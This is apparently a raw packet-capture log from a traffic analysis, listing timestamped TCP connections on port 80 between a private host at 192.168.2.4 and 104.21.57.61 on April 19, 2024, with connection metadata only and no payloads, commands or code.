                                                                                                                                    Apr 19, 2024 13:43:31.991712093 CEST8049840104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.236135006 CEST8049840104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.236185074 CEST8049840104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.236254930 CEST4984080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.363847017 CEST4984080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.364470005 CEST4984180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.461431026 CEST4984280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.468322992 CEST8049840104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.468441010 CEST8049841104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.468516111 CEST4984080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.468523026 CEST4984180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.565773964 CEST8049842104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.567662001 CEST4984280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.567759991 CEST4984280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.581789017 CEST4984380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.672112942 CEST8049842104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.672477961 CEST8049842104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.672622919 CEST4984280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.686937094 CEST8049843104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.687002897 CEST4984380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.687083006 CEST4984380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.776738882 CEST8049842104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.791264057 CEST8049843104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.791620016 CEST8049843104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:32.791925907 CEST4984380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:32.896178961 CEST8049843104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.034478903 CEST8049842104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.034519911 CEST8049842104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.034692049 CEST4984280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.072165012 CEST8049843104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.072201967 CEST8049843104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.072268009 CEST4984380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.195871115 CEST4984380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.195895910 CEST4984280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.196468115 CEST4984480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.300447941 CEST8049844104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.300561905 CEST8049843104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.300590992 CEST4984480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.300682068 CEST4984380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.300807953 CEST4984480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.301224947 CEST8049842104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.301302910 CEST4984280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.404580116 CEST8049844104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.404798985 CEST8049844104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.404993057 CEST4984480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.509011030 CEST8049844104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.685295105 CEST8049844104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.685344934 CEST8049844104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.685391903 CEST4984480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.800986052 CEST4984480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.802793026 CEST4984580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.905716896 CEST8049844104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.905775070 CEST4984480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.906970024 CEST8049845104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:33.907056093 CEST4984580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:33.907149076 CEST4984580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:34.011425018 CEST8049845104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:34.011806965 CEST8049845104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:34.012062073 CEST4984580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:34.116446018 CEST8049845104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:34.382775068 CEST8049845104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:34.382797003 CEST8049845104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:34.382889986 CEST4984580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:34.503191948 CEST4984580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:34.503818989 CEST4984680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:34.607587099 CEST8049845104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:34.607963085 CEST8049846104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:34.608084917 CEST4984580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:34.608236074 CEST4984680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:34.608321905 CEST4984680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:34.712481976 CEST8049846104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:34.712671041 CEST8049846104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:34.712961912 CEST4984680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:34.817284107 CEST8049846104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:34.989496946 CEST8049846104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:34.989520073 CEST8049846104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:34.989723921 CEST4984680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:35.114773035 CEST4984680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:35.115339041 CEST4984780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:35.219366074 CEST8049846104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:35.219392061 CEST8049847104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:35.219471931 CEST4984680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:35.219490051 CEST4984780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:35.219624996 CEST4984780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:35.323561907 CEST8049847104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:35.323859930 CEST8049847104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:35.324008942 CEST4984780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:35.428086996 CEST8049847104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:35.597403049 CEST8049847104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:35.597429991 CEST8049847104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:35.597533941 CEST4984780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:35.758759975 CEST4984780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:35.759387016 CEST4984880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:35.863156080 CEST8049847104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:35.863236904 CEST4984780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:35.863349915 CEST8049848104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:35.863435030 CEST4984880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:35.863596916 CEST4984880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:35.967592955 CEST8049848104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:35.967883110 CEST8049848104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:35.968077898 CEST4984880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:36.072202921 CEST8049848104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:36.330974102 CEST8049848104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:36.330997944 CEST8049848104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:36.331082106 CEST4984880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:36.456665039 CEST4984880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:36.457397938 CEST4984980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:36.561091900 CEST8049848104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:36.561150074 CEST4984880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:36.561465025 CEST8049849104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:36.561551094 CEST4984980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:36.561692953 CEST4984980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:36.665688038 CEST8049849104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:36.666327953 CEST8049849104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:36.666505098 CEST4984980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:36.770719051 CEST8049849104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:36.929672956 CEST8049849104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:36.929702997 CEST8049849104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:36.929774046 CEST4984980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:37.252918005 CEST4984980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:37.253196001 CEST4985080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:37.357312918 CEST8049850104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:37.357403994 CEST4985080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:37.357990026 CEST8049849104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:37.358052969 CEST4984980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:37.358191967 CEST4985080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:37.462188005 CEST8049850104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:37.462452888 CEST8049850104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:37.538373947 CEST4985080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:38.583352089 CEST4985080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:38.594866037 CEST4985180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:38.595434904 CEST4985080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:38.687716007 CEST8049850104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:38.699367046 CEST8049851104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:38.699454069 CEST4985180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:38.699636936 CEST4985180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:38.701112986 CEST8049850104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:38.701179981 CEST4985080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:38.803641081 CEST8049851104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:38.803930998 CEST8049851104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:38.804451942 CEST4985180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:38.827249050 CEST4985280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:38.909776926 CEST8049851104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:38.931691885 CEST8049852104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:38.931951046 CEST4985280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:38.931951046 CEST4985280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:39.037622929 CEST8049852104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:39.038124084 CEST8049852104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:39.038435936 CEST4985280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:39.066993952 CEST8049851104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:39.067050934 CEST8049851104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:39.067110062 CEST4985180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:39.142887115 CEST8049852104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:39.313425064 CEST8049852104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:39.313484907 CEST8049852104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:39.313563108 CEST4985280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:39.440779924 CEST4985180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:39.440870047 CEST4985280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:39.441423893 CEST4985380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:39.545593977 CEST8049851104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:39.545659065 CEST8049853104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:39.545660019 CEST4985180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:39.545855999 CEST4985380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:39.545855999 CEST4985380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:39.546407938 CEST8049852104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:39.546478033 CEST4985280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:39.650378942 CEST8049853104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:39.650800943 CEST8049853104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:39.652947903 CEST4985380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:39.758796930 CEST8049853104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:40.021022081 CEST8049853104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:40.021117926 CEST8049853104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:40.021199942 CEST4985380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:40.142805099 CEST4985380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:40.143167019 CEST4985480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:40.248903036 CEST8049854104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:40.248965025 CEST8049853104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:40.249079943 CEST4985480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:40.249310017 CEST4985380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:40.249349117 CEST4985480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:40.353800058 CEST8049854104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:40.353858948 CEST8049854104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:40.355811119 CEST4985480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:40.460560083 CEST8049854104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:40.708277941 CEST8049854104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:40.708338976 CEST8049854104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:40.708388090 CEST4985480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:40.830636024 CEST4985480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:40.831455946 CEST4985580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:40.935947895 CEST8049854104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:40.936014891 CEST8049855104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:40.936059952 CEST4985480192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:40.936418056 CEST4985580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:40.936512947 CEST4985580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:41.041105986 CEST8049855104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:41.041160107 CEST8049855104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:41.041522980 CEST4985580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:41.145723104 CEST8049855104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:41.399600029 CEST8049855104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:41.399665117 CEST8049855104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:41.399862051 CEST4985580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:41.519800901 CEST4985580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:41.520087957 CEST4985680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:41.624320030 CEST8049856104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:41.624532938 CEST4985680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:41.624532938 CEST4985680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:41.624876022 CEST8049855104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:41.625080109 CEST4985580192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:41.728961945 CEST8049856104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:41.729137897 CEST8049856104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:41.729377985 CEST4985680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:41.833446980 CEST8049856104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:42.021167040 CEST8049856104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:42.021229982 CEST8049856104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:42.021471024 CEST4985680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:42.149986982 CEST4985680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:42.150587082 CEST4985780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:42.255414009 CEST8049856104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:42.255480051 CEST8049857104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:42.255608082 CEST4985680192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:42.255676031 CEST4985780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:42.255676031 CEST4985780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:42.360289097 CEST8049857104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:42.360510111 CEST8049857104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:42.360666990 CEST4985780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:42.465636969 CEST8049857104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:42.727601051 CEST8049857104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:42.727665901 CEST8049857104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:42.727895975 CEST4985780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:42.845716000 CEST4985780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:42.846103907 CEST4985880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:42.954024076 CEST8049858104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:42.954082966 CEST8049857104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:42.954128981 CEST4985880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:42.954186916 CEST4985780192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:42.954305887 CEST4985880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:43.059468031 CEST8049858104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:43.059529066 CEST8049858104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:43.059720993 CEST4985880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:43.164284945 CEST8049858104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:43.310870886 CEST8049858104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:43.310934067 CEST8049858104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:43.311100960 CEST4985880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:43.441906929 CEST4985880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:43.442512989 CEST4985980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:43.546824932 CEST8049858104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:43.546884060 CEST8049859104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:43.546895027 CEST4985880192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:43.546957970 CEST4985980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:43.547169924 CEST4985980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:43.651510000 CEST8049859104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:43.651573896 CEST8049859104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:43.651904106 CEST4985980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:43.756355047 CEST8049859104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.004384041 CEST8049859104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.004411936 CEST8049859104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.004477024 CEST4985980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.070283890 CEST4985980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.070848942 CEST4986080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.135911942 CEST4986180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.175436974 CEST8049859104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.175517082 CEST8049860104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.175684929 CEST4985980192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.175852060 CEST4986080192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.240356922 CEST8049861104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.240555048 CEST4986180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.240638971 CEST4986180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.345190048 CEST8049861104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.345274925 CEST8049861104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.345418930 CEST4986180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.449978113 CEST8049861104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.608484983 CEST8049861104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.608544111 CEST8049861104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.608602047 CEST4986180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.725779057 CEST4986180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.726752996 CEST4986280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.830749035 CEST8049861104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.830827951 CEST4986180192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.831244946 CEST8049862104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.831331968 CEST4986280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.831482887 CEST4986280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:44.935725927 CEST8049862104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.935870886 CEST8049862104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:44.936037064 CEST4986280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:45.040451050 CEST8049862104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:45.291505098 CEST8049862104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:45.291563988 CEST8049862104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:45.291621923 CEST4986280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:45.291764975 CEST4986280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:45.398204088 CEST8049862104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:45.399636984 CEST4986280192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:45.411209106 CEST4986380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:45.515893936 CEST8049863104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:45.515981913 CEST4986380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:45.516130924 CEST4986380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:45.620630980 CEST8049863104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:45.620919943 CEST8049863104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:45.621064901 CEST4986380192.168.2.4104.21.57.61
                                                                                                                                    Apr 19, 2024 13:43:45.726525068 CEST8049863104.21.57.61192.168.2.4
                                                                                                                                    Apr 19, 2024 13:43:45.880753994 CEST8049863104.21.57.61192.168.2.4
